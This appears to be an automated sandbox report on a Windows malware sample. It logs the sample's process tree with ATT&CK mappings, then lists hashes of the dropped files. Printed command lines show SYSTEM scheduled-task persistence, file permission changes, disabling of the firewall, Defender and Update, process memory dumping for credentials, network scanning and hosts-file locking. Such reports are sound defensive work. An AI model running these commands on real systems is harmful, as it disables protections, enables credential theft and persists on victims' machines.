- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5052
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4196
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3448
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3524
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3564
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:436
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4708
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4248
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2464
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2904
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2296
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1948
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4324
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4772
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4408
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4308
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3428
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3424
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:2648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3736
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2632
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1344
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3116
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2464
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:2976
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:4836
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:2748
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:2396
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:636
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4228
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:4776
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4840
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1688
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:3156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:1056
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4092
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1240
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:3480
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 764 C:\Windows\TEMP\nblmptktz\764.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2432
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  PID:2736
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 332 C:\Windows\TEMP\nblmptktz\332.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2476
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2132 C:\Windows\TEMP\nblmptktz\2132.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1344
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2668 C:\Windows\TEMP\nblmptktz\2668.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3156
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2752 C:\Windows\TEMP\nblmptktz\2752.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2320
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2996 C:\Windows\TEMP\nblmptktz\2996.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4840
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3060 C:\Windows\TEMP\nblmptktz\3060.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4956
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3768 C:\Windows\TEMP\nblmptktz\3768.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4160
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3856 C:\Windows\TEMP\nblmptktz\3856.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3964
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3916 C:\Windows\TEMP\nblmptktz\3916.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3924
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3996 C:\Windows\TEMP\nblmptktz\3996.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4776
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 2912 C:\Windows\TEMP\nblmptktz\2912.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:904
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 4064 C:\Windows\TEMP\nblmptktz\4064.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3020
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 5104 C:\Windows\TEMP\nblmptktz\5104.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5080
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 4948 C:\Windows\TEMP\nblmptktz\4948.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4060
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 3548 C:\Windows\TEMP\nblmptktz\3548.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2296
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 1912 C:\Windows\TEMP\nblmptktz\1912.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2544
- C:\Windows\TEMP\nblmptktz\cntrtrctt.exe
  C:\Windows\TEMP\nblmptktz\cntrtrctt.exe -accepteula -mp 4772 C:\Windows\TEMP\nblmptktz\4772.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4396
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\nblmptktz\etgfqftjv\scan.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3764
- - C:\Windows\nblmptktz\etgfqftjv\ncgcflyve.exe
    ncgcflyve.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6252
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6960
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:6492
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6280

C:\Windows\SysWOW64\iaacws.exe
C:\Windows\SysWOW64\iaacws.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3912

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
1⤵
PID:4308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3436
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
  2⤵
  PID:560

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
1⤵
PID:3564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5040
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
  2⤵
  PID:1344

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\pnreyic.exe
1⤵
PID:4304
- C:\Windows\ime\pnreyic.exe
  C:\Windows\ime\pnreyic.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3544

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\pnreyic.exe
1⤵
PID:6304
- C:\Windows\ime\pnreyic.exe
  C:\Windows\ime\pnreyic.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5616

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
1⤵
PID:6076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:6400
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F
  2⤵
  PID:4360

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
1⤵
PID:6748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5572
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F
  2⤵
  PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\gcettrccj\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\nblmptktz\2132.dmp

Filesize
4.1MB

MD5
79963f8045fa41c6ac8af9b37a785997

SHA1
89243805729bd314bd352e69b77a35423e3c7d19

SHA256
f636e72c710a5106262810d1a13ed5fceb308446e1f9b0abfc4329d56953efde

SHA512
0414387928ca765be09ecf9e052f4d72ffd49d185a19de9862d821342ef8084ac3ba391c3a84f4e2708a5bc67363a528754be676c0236d7d48ec4c7a9f425f03

Download Submit
C:\Windows\TEMP\nblmptktz\2668.dmp

Filesize
4.0MB

MD5
40b5cb4397fa745c568e0feefb00a74b

SHA1
feb8f144574beca8079df80a25158e0a4ff0deb4

SHA256
f12d92fff466124055ae3ede1a71f1700ef818a590655f5b88c4368958e07438

SHA512
8516ea25f707f46386d3882302af7e2540a92526202411c92315adcb18b0b52e9f7d8c5b7b297e119390c4f04bbbe33bc49a4800eeee40f5388ef93fa871a8d3

Download Submit
C:\Windows\TEMP\nblmptktz\2752.dmp

Filesize
7.5MB

MD5
6eea5a55574d156ed9f1252928dc5b80

SHA1
9cb663edd589930121316bb8b43b6b9b14be5e47

SHA256
ef9bd8c47e2cacfafcdff4d9e840be9da59f03784e21aeb8b97e030839c7c0de

SHA512
b193f7824ac2c33f2b7558a1c6fb0f453790381dbf3c60de8c79eba33bba30aa7d75dc9af414ca14f4c75d74f454e2b77260e3762a8e0b17ddfed08be0fe84fb

Download Submit
C:\Windows\TEMP\nblmptktz\2912.dmp

Filesize
1.2MB

MD5
fb6010e3ad37588d073a3539b51642e8

SHA1
4c1801bab8cda5c3ccee4567246bd1d15d52a73d

SHA256
5a60d770130d420db6be79e2c4b44aedf1b7caa2a49f93d34172daf68f4a3414

SHA512
9ca5ed338ec239a5fdc42b33089d51a4595dc1c247239979b320eaafc5c9a98304d7b6447559d6abe818b65eb3bc83e3ad38c1ac6af3f2d1bd2e693efc282b53

Download Submit
C:\Windows\TEMP\nblmptktz\2996.dmp

Filesize
3.0MB

MD5
a3e0b0631f9c8da7e1daccd6410aa194

SHA1
86b5107af9c6a5b066b449fbbc94f26763116175

SHA256
a7a070e53c5f200a112cf9168fa55efeb24b1113d785cfab0ccd02f189f5c713

SHA512
013249e113733579379fcec0f2536a80f923273ae539f1d59c726587259a9b6fce8844d49307726f64605c67663a3443694e97ad3002d6113ba249098b573b59

Download Submit
C:\Windows\TEMP\nblmptktz\3060.dmp

Filesize
814KB

MD5
42befd30794e179820cda73ce8e6f050

SHA1
2fba32b842f3d0c8691cc3482c0788af0d364fce

SHA256
8116e92625a7cb44ade6d69e7872cf8f857e4c44cd6e301bb8227af3f99b591c

SHA512
a7f4927a90f14e9093ecea951a1de9dbd5ff8890f604846ef019a05191eaf839f2cf4399bcba2427f61d07ae99e3dc58d273ff7943a1efd703ad5e459567d576

Download Submit
C:\Windows\TEMP\nblmptktz\332.dmp

Filesize
33.5MB

MD5
db4d6e71ec79c982007c1f4cbb2e536d

SHA1
9669a1ee88aa10890d93c21c57a030b4a2c04eee

SHA256
729633ddf300c323aa596bc7a1383fd41847209d7479b8a6396924f3a60a30bc

SHA512
7eacf55d42b42f329ceba6a6ea7388f900b2dcc46f86e6f79035cffceb7b84b899439231e72027e5ce6197d8b202d61df0e019091c4871d8344adee14295dc91

Download Submit
C:\Windows\TEMP\nblmptktz\3768.dmp

Filesize
3.3MB

MD5
93364d7abe96a792c1d6d9795713151c

SHA1
79a4a9cc9dfd660f11013286e333a02772e26a5f

SHA256
8136cd8df29854cb4d772b4c8097e97275010427fa783b75804a8c40e54eeac6

SHA512
ba98f9106eea203542b2c97dbbb529a18124d6eef5eda11791c5d59c80f1bfb6ccc3cbb2675caa9d1d30296f5ecd62201be8a57e5076aa431cf7335e3ce5b18d

Download Submit
C:\Windows\TEMP\nblmptktz\3856.dmp

Filesize
20.8MB

MD5
6b3a2e9ff10b6d82b106f6a71b9faa68

SHA1
8db9b925841be26e58df51c85ca6bef64160e939

SHA256
1eae97544d75aeff7fed1a5122cd39137afd57a5b3804cd9fac9306eaf1b7653

SHA512
ad852008f9a0d79346be3a98b7fbed970ae86ccbb40389b9e61d135d330a2bea4c31edf54f204b393e6fc19e04e23a89b992714a1959392e036559eaa5d93141

Download Submit
C:\Windows\TEMP\nblmptktz\3916.dmp

Filesize
8.5MB

MD5
5528ba566be42ac801e79f8631ee0bd5

SHA1
61ea28c258c4f8a400a7a4d5b730906a992382aa

SHA256
1c9cacd01e076a0753808dc4fbf6cc008b5eecdc550716e04909061e31709aa8

SHA512
f43bf0f87a20d28d47b96c322b25e8e22f6591ee9f57bc3a3a15270b150d9cb082de6054d74d44429028eaa16a7e2429c978c6c667004f84c7be074e3144e0a4

Download Submit
C:\Windows\TEMP\nblmptktz\3996.dmp

Filesize
43.9MB

MD5
d44eed00a0550b4ffabac4af5fdfae7f

SHA1
e23fc627a8a24f0c7aa29179ab258c038bde210d

SHA256
56b7c650cc96b6455212c57f69dd4e163909d64d30fbd83bc24af3d790faa77f

SHA512
412fb72b6c5e788d4788757891d30405a16e56aad231c28a197a7b83edef0a348c3af690edbf11c661dc7e3f2592f3613275f83b71bfba81c01e432cb0ee879a

Download Submit
C:\Windows\TEMP\nblmptktz\4064.dmp

Filesize
25.9MB

MD5
cfeecebf90ca7ee7143c108d3db3f202

SHA1
a0c42e3a4c6556896e6a94e9c4df5db3872ba49a

SHA256
6f3c690cff88b0dfda7df93d286a91f137b1f2f406da6031027a6e4d95b07ee3

SHA512
c0af947f103bea7ca2c7e7bc8cab86101028838f72833243aecd6671169f8cea3886a7c3e21612bf647f899ebd844abdc88ec744e3b7577d830485862665bdd6

Download Submit
C:\Windows\TEMP\nblmptktz\5104.dmp

Filesize
8.8MB

MD5
6093aa3b99e5551d8449d287c52236da

SHA1
8f387f50d5b0aa62cd7394bb859b56e73e675d32

SHA256
808c28b890b4e36e58ea4650121b7cae25ced6a74e9258aa205f5220e3df3915

SHA512
0fd9b1c68ea1f1230ce7820d8845a6c46c4d24f4fb6f6d6db1ecf1f806c84f57e5fc9f868e26582ff3c5a24a35123641fbd9bdb1ca71f5b47bb055fdb42eed9d

Download Submit
C:\Windows\TEMP\nblmptktz\764.dmp

Filesize
1019KB

MD5
8b100759160d3f4c68773dc5b3c4fe37

SHA1
b85e5a755b15b72364ec7b0cf2f68ab473997c61

SHA256
b6bd8782f1c6881dca33139c8effbaa74eaedb29dd93d6a37a168a383b29289f

SHA512
507fe36f0a0ee8cb4f9a33b2d2df5fc2fd6c6a37b65bd2a1c883330dae4921f21a13b1bbc665425d28ccdd5eb03ba4d5a2b70958a8cc38668d9d64a75dcd82fe

Download Submit
C:\Windows\Temp\gcettrccj\zergmt.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\nblmptktz\cntrtrctt.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\nshD7F3.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nshD7F3.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\hrmeszcf\pnreyic.exe

